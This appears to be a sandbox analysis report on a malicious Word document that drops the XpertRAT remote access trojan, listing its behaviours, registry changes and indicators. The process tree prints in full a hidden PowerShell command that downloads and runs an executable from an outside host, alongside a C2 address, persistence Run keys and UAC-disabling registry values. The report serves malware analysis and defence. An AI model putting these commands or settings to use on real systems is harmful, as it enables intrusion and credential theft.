xpertrat | 4a67cc05b5f45a774fafb1da0a0e8ac0f3839a0b520c0b2346bbeeace304aa77

Analysis

max time kernel
159s
max time network
161s
platform
windows7_x64
resource
win7v20210408
submitted
20-09-2021 12:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

IMG_Order PO 094765 SMH.doc
Size

241KB
MD5

09c275af1fe403ef1955cf691179cb33
SHA1

49b1427effc50d6949c45e22fecbbfba4b2380c5
SHA256

4a67cc05b5f45a774fafb1da0a0e8ac0f3839a0b520c0b2346bbeeace304aa77
SHA512

4e48d08153575ce1238591654f557cc410d36b04f9e9160d0d26f9db9e1e3cb5ec267654af9a97eaad544d0e43f9a5fe2b1b27bfc2ddc16ee2aec8efe00e05ef

Score

10^/10

xpertrat test evasion persistence rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

httP://esetnode32-antiviru.ydns.eu/EXCEL.exe

Extracted

Family

xpertrat

Version

3.0.10

Botnet

Test

kapasky-antivirus.firewall-gateway.net:4000

Mutex

L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0

Signatures

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	700	1060	powershell.exe	WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1804	1060	powershell.exe	WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1908	1060	powershell.exe	WINWORD.EXE

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
XpertRAT
XpertRAT is a remote access trojan with various capabilities.
rat xpertrat

XpertRAT Core Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1756-298-0x0000000000401364-mapping.dmp	xpertrat

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral1/memory/2480-317-0x0000000000411654-mapping.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/2344-320-0x0000000000442F04-mapping.dmp	WebBrowserPassView

Nirsoft 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1172-314-0x0000000000423BC0-mapping.dmp	Nirsoft
behavioral1/memory/2480-317-0x0000000000411654-mapping.dmp	Nirsoft
behavioral1/memory/2344-320-0x0000000000442F04-mapping.dmp	Nirsoft
behavioral1/memory/2532-327-0x000000000040C2A8-mapping.dmp	Nirsoft

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe"	iexplore.exe

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 700 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 6 IoCs

Processes:

EXCEL.exeEXCEL.exeEXCEL.exeEXCEL.exeEXCEL.exeEXCEL.exe

pid process

1800 EXCEL.exe
1956 EXCEL.exe
1632 EXCEL.exe
864 EXCEL.exe
2056 EXCEL.exe
684 EXCEL.exe
Loads dropped DLL 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exeEXCEL.exeEXCEL.exeEXCEL.exe

pid process

700 powershell.exe
1804 powershell.exe
1908 powershell.exe
1632 EXCEL.exe
1956 EXCEL.exe
1800 EXCEL.exe

flow	pid	process
5	700	powershell.exe

pid	process
1800	EXCEL.exe
1956	EXCEL.exe
1632	EXCEL.exe
864	EXCEL.exe
2056	EXCEL.exe
684	EXCEL.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

EXCEL.exeEXCEL.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UACDisableNotify = "0"	EXCEL.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UACDisableNotify = "0"	EXCEL.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe"	iexplore.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe"	iexplore.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

EXCEL.exeEXCEL.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	EXCEL.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	EXCEL.exe

Suspicious use of SetThreadContext 9 IoCs

Processes:

EXCEL.exeEXCEL.exeEXCEL.exeEXCEL.exeiexplore.exe

description	pid	process	target process
PID 1632 set thread context of 864	1632	EXCEL.exe	EXCEL.exe
PID 1956 set thread context of 2056	1956	EXCEL.exe	EXCEL.exe
PID 2056 set thread context of 1756	2056	EXCEL.exe	iexplore.exe
PID 1800 set thread context of 684	1800	EXCEL.exe	EXCEL.exe
PID 1756 set thread context of 1172	1756	iexplore.exe	iexplore.exe
PID 1756 set thread context of 2480	1756	iexplore.exe	iexplore.exe
PID 1756 set thread context of 2344	1756	iexplore.exe	iexplore.exe
PID 1756 set thread context of 2144	1756	iexplore.exe	iexplore.exe
PID 1756 set thread context of 2532	1756	iexplore.exe	iexplore.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1060 WINWORD.EXE

pid	process
1060	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 41 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeEXCEL.exeEXCEL.exeEXCEL.exeEXCEL.exeiexplore.exe

pid	process
700	powershell.exe
1804	powershell.exe
1908	powershell.exe
1908	powershell.exe
1804	powershell.exe
700	powershell.exe
1524	powershell.exe
1696	powershell.exe
1832	powershell.exe
1524	powershell.exe
1832	powershell.exe
1696	powershell.exe
568	powershell.exe
568	powershell.exe
1948	powershell.exe
1948	powershell.exe
1308	powershell.exe
1308	powershell.exe
744	powershell.exe
744	powershell.exe
1452	powershell.exe
2640	powershell.exe
1452	powershell.exe
2640	powershell.exe
3032	powershell.exe
3040	powershell.exe
3032	powershell.exe
3040	powershell.exe
2584	powershell.exe
2584	powershell.exe
1632	EXCEL.exe
1632	EXCEL.exe
1956	EXCEL.exe
1956	EXCEL.exe
2056	EXCEL.exe
2056	EXCEL.exe
1800	EXCEL.exe
1800	EXCEL.exe
2056	EXCEL.exe
2056	EXCEL.exe
2344	iexplore.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	700	powershell.exe
Token: SeDebugPrivilege	1804	powershell.exe
Token: SeDebugPrivilege	1908	powershell.exe
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeDebugPrivilege	1832	powershell.exe
Token: SeDebugPrivilege	568	powershell.exe
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeIncreaseQuotaPrivilege	1696	powershell.exe
Token: SeSecurityPrivilege	1696	powershell.exe
Token: SeTakeOwnershipPrivilege	1696	powershell.exe
Token: SeLoadDriverPrivilege	1696	powershell.exe
Token: SeSystemProfilePrivilege	1696	powershell.exe
Token: SeSystemtimePrivilege	1696	powershell.exe
Token: SeProfSingleProcessPrivilege	1696	powershell.exe
Token: SeIncBasePriorityPrivilege	1696	powershell.exe
Token: SeCreatePagefilePrivilege	1696	powershell.exe
Token: SeBackupPrivilege	1696	powershell.exe
Token: SeRestorePrivilege	1696	powershell.exe
Token: SeShutdownPrivilege	1696	powershell.exe
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeSystemEnvironmentPrivilege	1696	powershell.exe
Token: SeRemoteShutdownPrivilege	1696	powershell.exe
Token: SeUndockPrivilege	1696	powershell.exe
Token: SeManageVolumePrivilege	1696	powershell.exe
Token: 33	1696	powershell.exe
Token: 34	1696	powershell.exe
Token: 35	1696	powershell.exe
Token: SeIncreaseQuotaPrivilege	1524	powershell.exe
Token: SeSecurityPrivilege	1524	powershell.exe
Token: SeTakeOwnershipPrivilege	1524	powershell.exe
Token: SeLoadDriverPrivilege	1524	powershell.exe
Token: SeSystemProfilePrivilege	1524	powershell.exe
Token: SeSystemtimePrivilege	1524	powershell.exe
Token: SeProfSingleProcessPrivilege	1524	powershell.exe
Token: SeIncBasePriorityPrivilege	1524	powershell.exe
Token: SeCreatePagefilePrivilege	1524	powershell.exe
Token: SeBackupPrivilege	1524	powershell.exe
Token: SeRestorePrivilege	1524	powershell.exe
Token: SeShutdownPrivilege	1524	powershell.exe
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeSystemEnvironmentPrivilege	1524	powershell.exe
Token: SeRemoteShutdownPrivilege	1524	powershell.exe
Token: SeUndockPrivilege	1524	powershell.exe
Token: SeManageVolumePrivilege	1524	powershell.exe
Token: 33	1524	powershell.exe
Token: 34	1524	powershell.exe
Token: 35	1524	powershell.exe
Token: SeIncreaseQuotaPrivilege	1832	powershell.exe
Token: SeSecurityPrivilege	1832	powershell.exe
Token: SeTakeOwnershipPrivilege	1832	powershell.exe
Token: SeLoadDriverPrivilege	1832	powershell.exe
Token: SeSystemProfilePrivilege	1832	powershell.exe
Token: SeSystemtimePrivilege	1832	powershell.exe
Token: SeProfSingleProcessPrivilege	1832	powershell.exe
Token: SeIncBasePriorityPrivilege	1832	powershell.exe
Token: SeCreatePagefilePrivilege	1832	powershell.exe
Token: SeBackupPrivilege	1832	powershell.exe
Token: SeRestorePrivilege	1832	powershell.exe
Token: SeShutdownPrivilege	1832	powershell.exe
Token: SeDebugPrivilege	1832	powershell.exe
Token: SeSystemEnvironmentPrivilege	1832	powershell.exe
Token: SeRemoteShutdownPrivilege	1832	powershell.exe
Token: SeUndockPrivilege	1832	powershell.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

WINWORD.EXEEXCEL.exeEXCEL.exeiexplore.exeEXCEL.exe

pid process

1060 WINWORD.EXE
1060 WINWORD.EXE
1060 WINWORD.EXE
1060 WINWORD.EXE
2056 EXCEL.exe
864 EXCEL.exe
1756 iexplore.exe
684 EXCEL.exe

pid	process
1060	WINWORD.EXE
1060	WINWORD.EXE
1060	WINWORD.EXE
1060	WINWORD.EXE
2056	EXCEL.exe
864	EXCEL.exe
1756	iexplore.exe
684	EXCEL.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WINWORD.EXEpowershell.exepowershell.exepowershell.exeEXCEL.exeEXCEL.exeEXCEL.exe

description	pid	process	target process
PID 1060 wrote to memory of 700	1060	WINWORD.EXE	powershell.exe
PID 1060 wrote to memory of 700	1060	WINWORD.EXE	powershell.exe
PID 1060 wrote to memory of 700	1060	WINWORD.EXE	powershell.exe
PID 1060 wrote to memory of 700	1060	WINWORD.EXE	powershell.exe
PID 1060 wrote to memory of 1804	1060	WINWORD.EXE	powershell.exe
PID 1060 wrote to memory of 1804	1060	WINWORD.EXE	powershell.exe
PID 1060 wrote to memory of 1804	1060	WINWORD.EXE	powershell.exe
PID 1060 wrote to memory of 1804	1060	WINWORD.EXE	powershell.exe
PID 1060 wrote to memory of 1908	1060	WINWORD.EXE	powershell.exe
PID 1060 wrote to memory of 1908	1060	WINWORD.EXE	powershell.exe
PID 1060 wrote to memory of 1908	1060	WINWORD.EXE	powershell.exe
PID 1060 wrote to memory of 1908	1060	WINWORD.EXE	powershell.exe
PID 700 wrote to memory of 1956	700	powershell.exe	EXCEL.exe
PID 700 wrote to memory of 1956	700	powershell.exe	EXCEL.exe
PID 700 wrote to memory of 1956	700	powershell.exe	EXCEL.exe
PID 700 wrote to memory of 1956	700	powershell.exe	EXCEL.exe
PID 700 wrote to memory of 1956	700	powershell.exe	EXCEL.exe
PID 700 wrote to memory of 1956	700	powershell.exe	EXCEL.exe
PID 700 wrote to memory of 1956	700	powershell.exe	EXCEL.exe
PID 1804 wrote to memory of 1800	1804	powershell.exe	EXCEL.exe
PID 1804 wrote to memory of 1800	1804	powershell.exe	EXCEL.exe
PID 1804 wrote to memory of 1800	1804	powershell.exe	EXCEL.exe
PID 1804 wrote to memory of 1800	1804	powershell.exe	EXCEL.exe
PID 1804 wrote to memory of 1800	1804	powershell.exe	EXCEL.exe
PID 1804 wrote to memory of 1800	1804	powershell.exe	EXCEL.exe
PID 1804 wrote to memory of 1800	1804	powershell.exe	EXCEL.exe
PID 1908 wrote to memory of 1632	1908	powershell.exe	EXCEL.exe
PID 1908 wrote to memory of 1632	1908	powershell.exe	EXCEL.exe
PID 1908 wrote to memory of 1632	1908	powershell.exe	EXCEL.exe
PID 1908 wrote to memory of 1632	1908	powershell.exe	EXCEL.exe
PID 1908 wrote to memory of 1632	1908	powershell.exe	EXCEL.exe
PID 1908 wrote to memory of 1632	1908	powershell.exe	EXCEL.exe
PID 1908 wrote to memory of 1632	1908	powershell.exe	EXCEL.exe
PID 1632 wrote to memory of 1832	1632	EXCEL.exe	powershell.exe
PID 1632 wrote to memory of 1832	1632	EXCEL.exe	powershell.exe
PID 1632 wrote to memory of 1832	1632	EXCEL.exe	powershell.exe
PID 1632 wrote to memory of 1832	1632	EXCEL.exe	powershell.exe
PID 1956 wrote to memory of 1524	1956	EXCEL.exe	powershell.exe
PID 1956 wrote to memory of 1524	1956	EXCEL.exe	powershell.exe
PID 1956 wrote to memory of 1524	1956	EXCEL.exe	powershell.exe
PID 1956 wrote to memory of 1524	1956	EXCEL.exe	powershell.exe
PID 1956 wrote to memory of 1696	1956	EXCEL.exe	powershell.exe
PID 1956 wrote to memory of 1696	1956	EXCEL.exe	powershell.exe
PID 1956 wrote to memory of 1696	1956	EXCEL.exe	powershell.exe
PID 1956 wrote to memory of 1696	1956	EXCEL.exe	powershell.exe
PID 1632 wrote to memory of 568	1632	EXCEL.exe	powershell.exe
PID 1632 wrote to memory of 568	1632	EXCEL.exe	powershell.exe
PID 1632 wrote to memory of 568	1632	EXCEL.exe	powershell.exe
PID 1632 wrote to memory of 568	1632	EXCEL.exe	powershell.exe
PID 1956 wrote to memory of 1948	1956	EXCEL.exe	powershell.exe
PID 1956 wrote to memory of 1948	1956	EXCEL.exe	powershell.exe
PID 1956 wrote to memory of 1948	1956	EXCEL.exe	powershell.exe
PID 1956 wrote to memory of 1948	1956	EXCEL.exe	powershell.exe
PID 1632 wrote to memory of 1452	1632	EXCEL.exe	powershell.exe
PID 1632 wrote to memory of 1452	1632	EXCEL.exe	powershell.exe
PID 1632 wrote to memory of 1452	1632	EXCEL.exe	powershell.exe
PID 1632 wrote to memory of 1452	1632	EXCEL.exe	powershell.exe
PID 1800 wrote to memory of 1308	1800	EXCEL.exe	powershell.exe
PID 1800 wrote to memory of 1308	1800	EXCEL.exe	powershell.exe
PID 1800 wrote to memory of 1308	1800	EXCEL.exe	powershell.exe
PID 1800 wrote to memory of 1308	1800	EXCEL.exe	powershell.exe
PID 1060 wrote to memory of 2208	1060	WINWORD.EXE	splwow64.exe
PID 1060 wrote to memory of 2208	1060	WINWORD.EXE	splwow64.exe
PID 1060 wrote to memory of 2208	1060	WINWORD.EXE	splwow64.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

EXCEL.exeEXCEL.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	EXCEL.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	EXCEL.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\IMG_Order PO 094765 SMH.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1060

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://esetnode32-antiviru.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:700

C:\Users\Admin\AppData\Roaming\EXCEL.exe
"C:\Users\Admin\AppData\Roaming\EXCEL.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1956

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1696

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.facebook.com
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1948

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.twitter.com
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3040

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
4⤵
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:2056

C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
5⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:1756

C:\Windows\SysWOW64\notepad.exe
notepad.exe
6⤵
PID:1644

C:\Program Files (x86)\Internet Explorer\iexplore.exe
/stext "C:\Users\Admin\AppData\Roaming\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\utopsnxup0.txt"
6⤵
PID:1172

C:\Program Files (x86)\Internet Explorer\iexplore.exe
/stext "C:\Users\Admin\AppData\Roaming\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\utopsnxup1.txt"
6⤵
PID:2480

C:\Program Files (x86)\Internet Explorer\iexplore.exe
/stext "C:\Users\Admin\AppData\Roaming\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\utopsnxup2.txt"
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2344

C:\Program Files (x86)\Internet Explorer\iexplore.exe
/stext "C:\Users\Admin\AppData\Roaming\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\utopsnxup3.txt"
6⤵
PID:2144

C:\Program Files (x86)\Internet Explorer\iexplore.exe
/stext "C:\Users\Admin\AppData\Roaming\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\utopsnxup4.txt"
6⤵
PID:2532

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://esetnode32-antiviru.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"
2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1804

C:\Users\Admin\AppData\Roaming\EXCEL.exe
"C:\Users\Admin\AppData\Roaming\EXCEL.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1800

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1308

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:744

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.facebook.com
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2640

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.twitter.com
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2584

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
4⤵
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:684

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://esetnode32-antiviru.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"
2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1908

C:\Users\Admin\AppData\Roaming\EXCEL.exe
"C:\Users\Admin\AppData\Roaming\EXCEL.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1632

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1832

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:568

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.facebook.com
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1452

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.twitter.com
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3032

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:864

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2208

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_10a2719f-ab19-452c-9537-375fecbe5f96
MD5
df44874327d79bd75e4264cb8dc01811

SHA1
1396b06debed65ea93c24998d244edebd3c0209d

SHA256
55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

SHA512
95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1abda922-9e0e-4200-89d0-60796083afcc
MD5
be4d72095faf84233ac17b94744f7084

